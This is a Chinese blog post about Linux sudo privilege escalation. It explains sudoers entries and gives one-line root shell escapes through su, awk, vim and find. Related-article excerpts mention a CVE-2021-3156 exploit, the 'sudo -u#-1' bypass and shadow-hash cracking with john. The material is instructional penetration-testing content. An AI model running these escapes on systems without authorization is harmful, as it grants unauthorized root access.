linux SUDO提权

最新推荐文章于 2025-04-06 21:17:28 发布
最新推荐文章于 2025-04-06 21:17:28 发布
阅读量3.3k 收藏 3
点赞数 1
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_68652890/article/details/124203423
版权

suid提权

知识点:

sudo命令:
以系统管理者的身份执行指令
sudoer文件:
要想使一个用户具有使用sudo的能力,需要让root用户将其名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息注册到/etc/sudoers文件中,即完成对该用户的授权(此时该用户称为“sudoer”)才可以。

查看sudoers文件:
在这里插入图片描述

root all=(all:all)all  //root用户可在任何终端执行任意命令
wangw all=/usr/bin/find//wangw用户可在任何终端使用自己的密码执行find命令
wangw all=(root)nopasswd:/usr/bin/awk //wangw用户可在任何终端运行,以root身份执行awk命令且不需要密码

利用
sudo -l 查看wangw用户执行sudo的权限 all就是全部命令都可以执行sudo且不需要root密码
既然不需要root密码就开始尝试提权
在这里插入图片描述提权

su命令

sudo su

在这里插入图片描述

awk命令

sudo awk 'BEGIN {system("/bin/sh")}'

vim命令

sudo vim -c '! sh'

查找命令

sudo find . -exec /bin/sh ; -quit

Ki同学
关注
Linux sudo-cve-2021-3156
问题很多的小明
02-20 512
目前影响版本: 1.8.2- 1.8.31p2 1.9.0- 1.9.5 p1 复现 kali sudo --version 查看版本 如果存在漏洞,执行sudoedit -s /则返回如下 下载exp: exp(点击下载) 在tmp解压后编译执行: tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz cd CVE-2021-3156/ make &&./sudo-hax-me-a-sandwich 0 ...
Linux-02 sudo
weixin_45626840的博客
01-19 934
执行权限继承:当用户执行sudo后面跟随的命令时,这个命令会继承sudo权限。在这种情况下,虽然用户是普通用户,但由于sudo在以root用户的身份执行,随后的命令则也可以在root权限下运行。设置setuid权限sudo程序本身被设置了setuid属性,这意味着当任何用户执行这个程序时,它会以程序拥有者(通常是root)的权限运行。权限配置不当,如果这些可执行文件本身又可以调用其他可执行文件,或者可以更改系统的一些配置选项,就可以达到的目的。
Linuxsudo
qq_41123867的博客
03-27 2693
一、原理 sudolinux中临时使用其他用户命令(一般是root)的一种机制,使用sudo+命令时,将以root用户的身份执行命令。如果在执行命令的过程中,可以输入打开shell的脚本,系统将打开一个用户为root的shell,从而实现。 二、可以用来的命令 vi more less git 三、过程 环境:DC-2靶机,基于Debian7.11,已经拥有一个可以用ssh连接的低...
内网渗透-Linuxsudo
最新发布
lza20001103的博客
04-06 944
内网渗透-Linuxsudo
Linux sudo 命令
孤独,平庸,落魄
07-06 2776
Linux sudo 命令 当我们需要用root用户来进行一些操作的时候,每次又不想切换到root用户下,可以给普通用户达来达目的。 1,修改配置文件 vim /etc/sudoers,在root这行下添加 user ALL=(ALL) ALL。 2,设置完成后,就可以sudo 命令 进行操作了。 3,如果你想每次的时候都输入普通用户的密码,就把wheel前边的# 注释去掉。 4,如果你想的时候不输入密码,就找到 %wheel ALL=
linux -sudo
mingyqf的博客
10-26 2449
sudo -l 前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux这块知识点。借此梳理一下sudo相关的姿势。 简介 sodu 全称 Substitute User and Do,用来临时赋予root权限运行某个程序。 sodu 的执行原理: 普通用户执行命令时,首先检查/var/run/sudo/目录下是否有用户时间戳,centos检查/var/db/sudo/目录,并检查是否过期。如果时间戳过期,就需要输入当前用户的密码。输入后检查/etc/sudoers配置文件,查看用.
linux sudo指令
稻草人敲代码的博客
01-20 1743
su指令可实现普通用户和root(超级管理员)之间的交换,值得注意的是,su默认只是切换身份,并没有切换环境变量,环境变量依然是普通用户的。但是修改sudoers文件是一件常敏感的事情,需要足够的权限,所以一般只允许root用户修改。,只要是涉及到高权限的指令就必须要root来运行,这样的话,超级管理员显然太累了。在前面的博客中我们学习了用户权限的概念,对用户权限还不了解的朋友可以去看一看。一般来说,身为普通用户是不可以使用超级管理员的权限的,但是考虑到。的名称是 "superuser do" 的缩写。
LinuxSudo 70种方法(上)
简单安全
04-04 2099
就是说flock能够解锁当前目录下的文件,允许它被操作其他的文件操作,这里是被bash操作,就会新起一个会话,因为这里是以sudo前缀执行,肯定就是root权限。利用cp命令,把TF变量里的内容里写入shadow文件,但要知道,这个操作是有损的,最后靶机shadow文件中只有这一行,如果不进行备份,在实际攻防中优先级是排后的。插件的使用方法是,这些python文件,去掉前面的前缀,后面就是插件名称,按照这个方式,在里面构建一个python文件,里面写入python语法。
Linux-70种sudo汇总
LINGX5的博客
08-29 1580
命令有 sudo权限,我们该如何进行呢?跟着红队笔记大佬,汇总了一下当我们有sudo -l时,70条命令可以sudo风暴视频连接: https://www.bilibili.com/video/BV1DV4y1U7bT/?
Linux曝出Sudo漏洞 任意用户亦可运行root命令
01-10
然而近期曝出的一个漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令。 (题图 via Hacker ...
Linuxsudo权限(入门)
m0_73726899的博客
08-08 2440
sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。
Linuxsudo使用方法简介
热门推荐
树下一少年的博客
01-09 1万+
本文基于Linux上CentOS 7版本进行配置演示 Linux上使用sudo命令给其他用户,为其赋予超级用户权限执行部分无权限命令以及sudo的常见参数简介 一.编辑配置文件给其他用户配置 1.查看配置文件内常用的参数 2.查看其他用户无权限时的情况 3.为其他用户配置sudo权限并测试 二.配置文件使其他用户执行sudo命令时无需密码 1.深感输密码的麻烦,为其设置使用sudo无需密码 2.在其他用户方测试 三.sudo命令的常见参数 1.sudo -h 2.sudo -l
Linuxsudo(简单明了一看就会!!!)
Aprilqxs的博客
06-03 1595
abc组 可以以tom用户的身份在server1主机上无密码执行 rm -rf , remove , del 命令。#abc 用户可以以任何用户身份在任何主机上无需密码的执行mkdir和useradd命令。#ABC用户可已在以任何用户身份在任何主机上 无需密码的执行任何命令。如果有用户需要做,就在这行下照格式写一行配置就OK了~用户 用户=(主机名) 命令列表。字段4(也就是最后的ALL): 执行的命令。字段2(ALL=):以哪个用户的身份。希望这些知识点对大家有帮助~~~~
Linuxsudo
2301_76227305的博客
04-02 750
总的来说sudosuid差不多,以上是常见的sudo的总结,后续会持续跟新。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Linuxsudo
佛系摆烂
11-16 1355
执行后会获得shadow存储的数据,将root的数据存放在shadow_root,然后使用john进行破解。报错信息会将shadow的第一行显示出来,将其保存在shadow_root文件中,然后用john进行破解。将root的一行的hash值复制下来保存到shadow_root.txt,利用john来破解密码。将root对应的hash替换为生成的hash,并保存到shadow_entry.txt文件。用生成的hash替换原有的root的密码并将其保存在shadow_root.txt。
linux sudo
weixin_30371875的博客
11-09 229
对于可以sudo的用户,就可以获得root权限,具体方法如下: 1.sudo vi sudo vi filename 在vi的命令行输入:!sh 进入shell 使用id查看,发现是root权限 2.sudo more sudo more filename 输入!sh 进入shell 使用id查看 3.sudo less sud...
Linux学习第二十一节-sudo
时光之眼的博客
03-06 1756
Linux学习第二十一节-sudo
linux申请sudo权限命令,[命令] Linux 命令 sudo(用户
weixin_39686230的博客
04-29 429
内容一:sudo 简介sudo 命令可以让 root 用户,在不知道 root 的密码的情况之下以 root 的身份执行某一些命令但是要实现这一目标需要前修改 sodu 的配置文件内容二:修改 sudo 配置文件的方法2.1 第一种修改 sudo 配置文件的方法# visudo2.1 第二种修改 sudo 配置文件的方法# vi /etc/sudoers内容三:修改 sudo 配置文件的案例3...
Linux--SUDO
qq_37107430的博客
02-05 1340
sudoLinux 中常用的特管理工具,允许普通用户以其他用户(通常是 root 用户)的身份运行命令。如果配置不当,攻击者可能通过滥用 sudo 权限升自己的权限
linux sudo漏洞,linux CVE-2019-14287 Sudo漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值